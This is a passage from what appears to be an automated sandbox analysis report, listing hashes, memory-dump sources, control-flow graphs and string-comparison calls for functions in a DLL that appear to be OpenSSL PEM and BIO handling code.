                                                                                                                                                                • Instruction Fuzzy Hash: CE51E022B1D78986DA109B16F85026EBBA0FB89BD4F484135EF9D07B95CE3CE501D740
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastbind
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_sock2.c
                                                                                                                                                                • API String ID: 2328862993-3200932406
                                                                                                                                                                • Opcode ID: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
                                                                                                                                                                • Instruction ID: 30c56119b40f581610f269746c31011502d75ef32152aae7b22b15237a8ead8a
                                                                                                                                                                • Opcode Fuzzy Hash: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
                                                                                                                                                                • Instruction Fuzzy Hash: 93210F72B0824A82E754DB22F8246AD7360FB90B84F440231EB5C43BDADF3DE546EB01
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                                                                                                                                • Instruction ID: 4b54806052ff6cef4f12e3f55ff26d6aa71be9add3cba16a1122a52c07ef6b19
                                                                                                                                                                • Opcode Fuzzy Hash: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0B4313682A509C759CE367848F5D6ED19791BC9F12C0309A4CC3F54E92EC5018B40
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                                                                                                                                • Instruction ID: f7d2f73c8d0cd081c4c05fc2f26f3e3d37724f92d0b6c85429900b3eac4eea3b
                                                                                                                                                                • Opcode Fuzzy Hash: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                                                                                                                                • Instruction Fuzzy Hash: ABE0DF727583A809C79ACE332918E6DAAA1A314BC6F43C0309A0DC3F41FD2EC601CB40
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 815 7ffd3fd93ec0-7ffd3fd93edf call 7ffd3fbe1ef1 818 7ffd3fd93ee2-7ffd3fd93eec 815->818 819 7ffd3fd93ef5-7ffd3fd93f01 818->819 820 7ffd3fd93eee-7ffd3fd93ef3 818->820 821 7ffd3fd93f07-7ffd3fd93f18 strcmp 819->821 822 7ffd3fd94133 819->822 820->818 820->819 824 7ffd3fd93f1e-7ffd3fd93f2f strcmp 821->824 825 7ffd3fd93fb1-7ffd3fd93fc2 strcmp 821->825 823 7ffd3fd94138-7ffd3fd9414c 822->823 824->822 828 7ffd3fd93f35-7ffd3fd93f46 strcmp 824->828 826 7ffd3fd94037-7ffd3fd94048 strcmp 825->826 827 7ffd3fd93fc4-7ffd3fd93fcb 825->827 829 7ffd3fd9404a-7ffd3fd9405b strcmp 826->829 830 7ffd3fd94061-7ffd3fd94072 strcmp 826->830 831 7ffd3fd93fd0-7ffd3fd93fd7 827->831 828->822 832 7ffd3fd93f4c 828->832 829->822 829->830 833 7ffd3fd9408b-7ffd3fd9409c strcmp 830->833 834 7ffd3fd94074-7ffd3fd94085 strcmp 830->834 831->831 835 7ffd3fd93fd9-7ffd3fd93fdc 831->835 836 7ffd3fd93f53-7ffd3fd93f5a 832->836 837 7ffd3fd940b5-7ffd3fd940c6 strcmp 833->837 838 7ffd3fd9409e-7ffd3fd940af strcmp 833->838 834->822 834->833 839 7ffd3fd93faa-7ffd3fd93fac 835->839 840 7ffd3fd93fde-7ffd3fd93ff6 strcmp 835->840 836->836 841 7ffd3fd93f5c-7ffd3fd93f5f 836->841 843 7ffd3fd940c8-7ffd3fd940d9 strcmp 837->843 844 7ffd3fd940db-7ffd3fd940ec strcmp 837->844 838->822 838->837 839->823 840->839 845 7ffd3fd93ff8-7ffd3fd93fff 840->845 841->839 842 7ffd3fd93f61-7ffd3fd93f79 strcmp 841->842 842->839 846 7ffd3fd93f7b-7ffd3fd93f82 842->846 843->822 843->844 847 7ffd3fd940ee-7ffd3fd940ff strcmp 844->847 848 7ffd3fd94101-7ffd3fd9411b strcmp 844->848 845->839 849 7ffd3fd94001-7ffd3fd94005 845->849 846->839 852 7ffd3fd93f84-7ffd3fd93f88 846->852 847->822 847->848 850 7ffd3fd9414d-7ffd3fd9415e strcmp 848->850 851 7ffd3fd9411d-7ffd3fd9411f 848->851 849->839 853 7ffd3fd94007-7ffd3fd9401a call 7ffd3fbe4e7b 849->853 857 7ffd3fd94178-7ffd3fd94190 strcmp 850->857 858 7ffd3fd94160 850->858 855 7ffd3fd94120-7ffd3fd9412b 851->855 852->839 856 7ffd3fd93f8a-7ffd3fd93f9a call 7ffd3fbe4e7b 852->856 853->839 866 7ffd3fd9401c-7ffd3fd94032 call 7ffd3fbe245a 853->866 855->850 860 7ffd3fd9412d-7ffd3fd94131 855->860 856->839 872 7ffd3fd93f9c-7ffd3fd93fa4 856->872 863 7ffd3fd941b8-7ffd3fd941bb 857->863 864 7ffd3fd94192-7ffd3fd94195 857->864 862 7ffd3fd94163-7ffd3fd9416e 858->862 860->822 860->855 862->857 868 7ffd3fd94170-7ffd3fd94174 862->868 865 7ffd3fd941c0-7ffd3fd941cb 863->865 869 7ffd3fd941a0-7ffd3fd941ab 864->869 865->839 870 7ffd3fd941d1-7ffd3fd941d5 865->870 866->823 868->862 873 7ffd3fd94176 868->873 869->863 874 7ffd3fd941ad-7ffd3fd941b1 869->874 870->865 875 7ffd3fd941d7-7ffd3fd941da 870->875 872->822 872->839 873->822 874->869 877 7ffd3fd941b3 874->877 878 7ffd3fd941e0-7ffd3fd941eb 875->878 877->822 879 7ffd3fd941f7-7ffd3fd941fd 878->879 880 7ffd3fd941ed-7ffd3fd941f1 878->880 879->823 880->878 881 7ffd3fd941f3 880->881 881->879
                                                                                                                                                                APIs
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F11
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F28
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F3F
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F72
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FBB
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FEF
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94041
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94054
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9406B
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9407E
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94095
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940A8
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940BF
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940D2
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940E5
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940F8
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9410B
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94157
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94182
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strcmp
                                                                                                                                                                • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                                                                                                                                • API String ID: 1004003707-1119032718
                                                                                                                                                                • Opcode ID: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
                                                                                                                                                                • Instruction ID: 125f5343d34db9bb31217c7e4bd847cf9c14f235e86eabb713160d7f0ee185b6
                                                                                                                                                                • Opcode Fuzzy Hash: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
                                                                                                                                                                • Instruction Fuzzy Hash: 9391E312F0C64F40FE5C9765A53437A1790AFA67D4F449232DF4E936C6EE2DE449A380
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 979 7ffd3fbe1b77-7ffd3fd93126 call 7ffd3fbe1ef1 983 7ffd3fd933b8 979->983 984 7ffd3fd9312c-7ffd3fd93131 979->984 985 7ffd3fd933bd-7ffd3fd933d5 983->985 984->983 986 7ffd3fd93137-7ffd3fd93139 984->986 986->983 987 7ffd3fd9313f-7ffd3fd93152 strncmp 986->987 988 7ffd3fd9317c-7ffd3fd93196 strspn 987->988 989 7ffd3fd93154-7ffd3fd93170 call 7ffd3fbe4057 987->989 991 7ffd3fd93175-7ffd3fd93177 988->991 992 7ffd3fd93198-7ffd3fd931a2 988->992 989->991 991->985 992->991 993 7ffd3fd931a4-7ffd3fd931cf strspn strncmp 992->993 994 7ffd3fd931d5-7ffd3fd931ec strspn 993->994 995 7ffd3fd933ec-7ffd3fd9340e call 7ffd3fbe4057 993->995 994->995 997 7ffd3fd931f2-7ffd3fd93208 strspn 994->997 995->985 998 7ffd3fd9320a-7ffd3fd9322c call 7ffd3fbe4057 997->998 999 7ffd3fd93231-7ffd3fd9324a strncmp 997->999 998->985 1002 7ffd3fd9324c-7ffd3fd9326e call 7ffd3fbe4057 999->1002 1003 7ffd3fd93273-7ffd3fd932cc strspn strcspn call 7ffd3fbe211c strspn 999->1003 1002->985 1009 7ffd3fd932ce-7ffd3fd932ee call 7ffd3fbe4057 1003->1009 1010 7ffd3fd932f3-7ffd3fd932fd call 7ffd3fbe1ad2 1003->1010 1009->985 1015 7ffd3fd932ff-7ffd3fd93307 1010->1015 1016 7ffd3fd93330 1010->1016 1017 7ffd3fd93309-7ffd3fd9332b call 7ffd3fbe4057 1015->1017 1018 7ffd3fd9335b-7ffd3fd93368 call 7ffd3fbe1ad2 1015->1018 1016->1018 1019 7ffd3fd93332-7ffd3fd93335 1016->1019 1017->985 1027 7ffd3fd93378-7ffd3fd9337c 1018->1027 1028 7ffd3fd9336a-7ffd3fd93373 memset 1018->1028 1019->1018 1021 7ffd3fd93337-7ffd3fd93359 call 7ffd3fbe4057 1019->1021 1021->985 1027->983 1029 7ffd3fd9337e 1027->1029 1028->1027 1030 7ffd3fd93380-7ffd3fd9338d call 7ffd3fbe6131 1029->1030 1033 7ffd3fd933d6-7ffd3fd933e3 1030->1033 1034 7ffd3fd9338f-7ffd3fd93396 1030->1034 1033->995 1035 7ffd3fd93398 1034->1035 1036 7ffd3fd9339b-7ffd3fd933b6 1034->1036 1035->1036 1036->983 1036->1030
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strspn$strncmp
                                                                                                                                                                • String ID: $ $ ,$..\s\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
                                                                                                                                                                • API String ID: 1384302209-3505811795
                                                                                                                                                                • Opcode ID: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
                                                                                                                                                                • Instruction ID: bcccf6dc8313dd3520a6f3af1aa437c73151b15f240eed1d7ffef2922d6de6e8
                                                                                                                                                                • Opcode Fuzzy Hash: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
                                                                                                                                                                • Instruction Fuzzy Hash: 9791DFA1B0C64B92F7289F61E82427B3761AF40784F444035DB8E43A96EF3DF54AE780
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
